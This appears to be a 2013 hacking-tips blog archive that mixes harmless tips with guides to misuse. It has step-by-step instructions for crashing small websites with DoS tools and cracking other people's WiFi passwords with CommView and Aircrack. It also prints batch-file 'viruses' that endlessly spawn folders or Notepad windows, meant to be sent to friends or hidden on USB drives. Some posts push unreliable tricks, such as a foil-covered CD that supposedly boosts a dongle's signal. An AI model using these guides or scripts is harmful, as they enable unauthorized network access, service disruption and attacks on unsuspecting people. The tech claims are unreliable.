Showing posts with label computer. Show all posts
Showing posts with label computer. Show all posts

Saturday, 14 September 2013

How to Extract Text from any Image ?

Free OCR is an online website which does this work for you in minutes and free of cost. The process is pretty simply and can be done easily by simply visiting the website then uploading the text image and then click Send to process the image and extract the text out of that image.
LINK :- http://www.free-ocr.com/

Friday, 13 September 2013

Speed Up of your internet Connection

Speed up Network Browsing by Removing
Network Scheduled Tasks
Open REGEDIT
-HKEY_LOCAL_MACHINESOFTWARE-Microsoft-
Windows-CurrentVersion-Explorer-
RemoteComputer-NameSpace-
{D6277990-4C6A-11CF-8D87-00AA0060F5BF}

Wednesday, 11 September 2013

How to get Better Signal Strength on USB Dongles

radio frequency of a modem
is increased when some
metallic or Aluminium stuff is
near the device,
It attracts the signal and
keeps it constant. You will get
more powerful network when
some aluminium thing like a
CD covered with
a Aluminum foil is
placed near your dongle, Lets
see the steps.
Take a CD/ DVD, and insert
the dongle between its hole
and connect the
USB extender cable on other
side, Now connect the other
end of USB cable with your
PC and keep or hang your
dongle near a window or
Open place.
That’s it, bu this way You will
notice increased signal strength o
which ever operators you are
using.
This is quite funny trick but
you will notice the difference
in your
network monitoring status
on your data card dashboard. your dongle speed will 100% increase.

Sunday, 8 September 2013

Do you want to use an onscreen keyboard? [without software]

Do you want to use an onscreen keyboard on your pc.
Its simple:
Go to start
>Run
Type osk
>enter.
Enjoy KEYBOARD ON YOUR SCREEN

Free Twitter Followers


NOTE:-get 50 free credits for joining.those credits you can use to get free twitter followers and also for facebook pages likes.

Friday, 6 September 2013

crash small websites

First Download 3 Softwares :-
1. Download Port Scanner
2. Download rDOS
3. Download Ip Hiding tool
 Follow these steps:
1: First of all you need to know the IP address of the website you
want to crash. Use ping command in windows to get the ip address of
the website.
open CMD and enter ping www.website.com see the snap Now
you have the IP address of the website.
2: Now use Port scanner to
check whether PORT 80 is open or not. If PORT 80 is not open choose another website to hack :P otherwise you can’t crash this website.
3: Now open your rDos. Enter
your victims ip that you got from step
1.It will ask you for the port to attack use port 80 that’s why we scanned to make sure that 80 was open! If it is closed it will not work.

Thursday, 5 September 2013

Hack WIFI PASSWORD







Step 1 : Install CommView for WiFi . It doesnt matter whether you install it in VoIP mode or Standard mode . I used VoIP . It automatically installs the necessary drivers . Allow it to install .Note :- You will not be able to connect to any Network using WiFi when using CommView .
Step 2 : Click on the PLAY ICON in the Left First
Step 3 (Choosing the Network (a) ) : A new window should pop up now. Click on the START SCANNING button
Step 4 : (Choosing the Network (b) ) : Click on the WiFi network you want to hack in the Right Coulumn and Click on CAPTURE.
Step 5 : (Capturing the Packets) : The windows should close now and you should see that CommView has started Capturing Packets .
Step 6 : (Saving the Packets ) : Now that the Packets are getting captured you need to Save them. Click on Settings->Options->Memory Usage Change Maximum Packets in buffer to 20000.
Click on the LOGGING Tab .
Check AUTO-SAVING
In the Maximum Directory Size : 5000
Average Log File Size : 50
Now CommView will automatically Start Saving packets in the .ncp format at a size of 20MB each in the specified directory .
Step 7 : ( Concatenating the Logs ) : Since you are capturing a lot of logs you will need to concatenate them into once file . To do this go to Logging and click on CONCATENATE LOGS Choose all the files that have been saved in your specified folder and Concatenate them .Now you will have one .ncf file .
Step 8 : (Converting .ncf to .cap ) : Now that you have one file with all the packets you need to Convert it into .cap file for AIRCRACK to crack .
Click on File->Log Viewer->Load Commview Logs-> Choose the .ncf file. Now File->Export->Wireshark/TCP dump format .

Aircrack Part :Now for the Second Part Cracking this is very simple . Just open the Aircrack Folder->Bin->Aircrack-ng GUI.exe Choose the .cap file and you should be able to do the others .
If you have any questions or having problems post a thread il reply 

Create virus for unlimited folders in computer




@echo off
:top
md %random%
goto top
Type above code in notepad and save it with name something.bat. send it to friend via E-mail or Hide it and upload it in pendrive.
NOTE:- Don’t Open in your pc.

Increase ultoo money automatically

Trick is 100% working
1] open Firefox if you don’t have first Download it
2] Go to add one search for GREASEMONKEY and insall it. ( Firefox most popular plugin )
3] Now go to  http://userscripts.org/scripts/show/159047 and click on INSTALL button.
4] Restart browser and go to sms.ultoo.com and see magic.
Your money will increase automatically bcoz this pluging will play all quiz and polls automatically.
NOTE:-if not work again go to sms.ultoo.com and login.

Open Notepad continually in your friend’s computer

Type :
@ECHO off
:top
START %SystemRoot%\system32
otepad.exe
GOTO top
Save it as Anything.BAT and send it.

Sunday, 1 September 2013

BackTrack 5 Free Download

Before Giving the Free Download Link, I Would First like to tell tell you What is BackTrack. I know many of you might be already aware of it, but still there are many more who don’t. 

What is BackTrack: 

BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack you Install BackTrack, boot it from a Live DVD or thumb-drive, the penetration distribution has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester. 

BackTrack 5 - Penetration Testing Distribution 



BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tools collection to-date. Its community of users range from skilled penetration testers in the information security field, government entities, information technology, security enthusiasts, and individuals new to the security community. 

Feedback from all industries and skill levels allows us to truly develop a solution that is tailored towards everyone and far exceeds anything ever developed both commercially and freely available. The project is funded by Offensive Security. Whether you’re hacking wireless, exploiting servers, performing a web application assessment, learning, or social-engineering a client, BackTrack is the one-stop-shop for all of your security needs. 



Do you have questions, comments, or suggestions? Feel free to post a comment! 

Learn Batch File Programming

In DOS, OS/2, and Microsoft Windows, batch file is the name given to a type of script file, a text file containing a series of commands to be executed by the command interpreter. Batch file are mainly used to do repeat tasks. Instead of typing in a commands over and over again to do a certain task, you can create a batch file that does it all automatically by performing a bulk set of commands.

So why should hackers know batch programming? Well I’ll give you a few ideas and you can decide on your own:

Attacks: DNS Poisoning; Packet flooders; Dictionary attacks; Creating Viruses; Service Disabler; Clearing Logs. 

Annoyance: Bombers (Fork, Broadcast); Msg Annoyers; Flooders (user, folders); Extension changer (ex. html -> exe); Keystroke remapper... and many more.

I came across batch file programming videos on youtube so i am sharing with you all. It will hardly take your 30 minutes and you will learn a new language. These are the 3 videos that every beginner to batch file programming should watch.


                                                   Introduction to Windows Batch Files (.bat files)





Batch Files Continued Part 1










Batch Files Continued Part 2








Do you have questions, comments, or suggestions? Feel free to post a comment!